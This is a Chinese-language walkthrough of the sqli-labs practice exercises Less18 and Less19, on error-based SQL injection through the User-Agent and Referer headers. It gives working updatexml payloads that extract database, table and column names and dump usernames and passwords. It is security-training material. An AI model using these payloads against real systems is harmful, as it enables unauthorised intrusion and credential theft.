目录
二、Less18(POST-Header injection -Uagent field -Error based)
三、Less19(POST-Header injection -Referer field -Error based)
推荐:
一、(手工)SQL注入基本步骤:
第一步:注入点测试
第二步:分析权限、过滤
第三步:爆数据库名
第四步:爆表名
第五步:爆字段名
第六步:爆数据
二、Less18(POST-Header injection -Uagent field -Error based)
2.1、简介:(Header注入)
请求方法:POST
方法:Header注入报错回显
2.2、第一步:注入点测试
输入框测试都不存在注入点
在Header中的User Agent中输入单引号报错
说明存在注入点
且为单引号闭合
2.3、第二步:分析过滤
对输入框都进行了过滤
接下来:
方法一:获得源码,寻找过滤不严谨的地方
方法二:寻找其他注入点(Header)
2.4、第三步:暴库
' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '
或者
' and updatexml(1,concat(0x7e,(select database())),1) and '
再或者
',1,updatexml(1,concat(0x7e, database(),0x7e),1))#
2.5、第四步:爆表名
',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
2.6、第五步:爆字段
',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
2.7、第六步:爆数据
',1,updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1))#
三、Less19(POST-Header injection -Referer field -Error based)
2.1、简介:(Header注入)
请求方法:POST
方法:Header注入报错回显
同Less18,仅字段不同,报错回显